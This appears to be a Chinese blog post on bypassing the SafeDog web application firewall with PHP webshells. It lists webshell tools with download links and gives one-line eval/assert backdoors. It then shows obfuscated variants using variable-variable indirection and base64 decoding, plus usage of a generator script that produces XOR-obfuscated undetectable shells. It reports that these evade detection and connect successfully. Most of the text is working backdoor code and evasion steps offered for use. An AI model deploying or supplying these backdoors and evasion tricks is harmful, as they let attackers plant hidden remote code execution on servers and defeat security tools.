WAF绕过-权限控制之代码混淆及行为造轮子
权限控制原理分析
webshell工具总结
- 菜刀:未更新状态,无插件,单向加密传输
- 蚁剑:更新状态,有插件,拓展性强,单向加密传输
- https://github.com/AntSwordProject/antSword/releases
- antSword-master.zip
- 冰蝎:更新状态,未知插件,双向加密传输
- https://github.com/rebeyond/Behinder/releases/
- Behinder_v3.0_Beta_11.t00ls.zip
变量覆盖绕过
使用的一句话木马
<?php @eval($_POST['chopper']);?>
// assert的函数名可以作为变量被传递调用
<?php assert($_POST['chopper']);?>
直接访问发现被拦截
拦截日志
改变木马写法绕过safedog
<?php
// a=b&b=assert&c=phpinfo();
$a = $_REQUEST['a'];
$$a = $_REQUEST['b'];
$b($_REQUEST['c']);
成功绕过安全狗
但是改为eval函数报错,此方法只适用于
assert()
有些安全产品会对参数进行验证,需要对参数进行加密传输绕过验证
对运行参数进行解密
<?php
// phpinfo(); => cGhwaW5mbygpOw==
// a=b&b=assert&c=cGhwaW5mbygpOw==
$a = $_REQUEST['a'];
$$a = $_REQUEST['b'];
$b(base64_decode($_REQUEST['c']));
加密混淆绕过
在
code_test
目录下上传post传参并且解密的文件test.php
<?php assert(base64_decode($_POST['x'])); ?>
安全狗查杀加密后的后门
访问加密之后路径
尝试通过网站的加密进行绕过
下载后查看,发现乱码了
上传到服务器后尝试连接
异或生成绕过
使用方法
python3 php-venom-3.3.py //生成免杀一句话
python3 php-venom-3.3.py shell.php //对同目录下shell.php进行免杀处理,结果保存在shell.php.bypass.php
使用说明
http://www.xxx.com/shell.php
POST: mr6=phpinfo(); //与普通shell相同
http://www.xxx.com/shell.php?id=xxx(xxxx随便修改)
POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
经过验证,可以绕过检测并成功连接
也有蚁剑插件版
最后一次更新于2022-03-24 13:44
0 条评论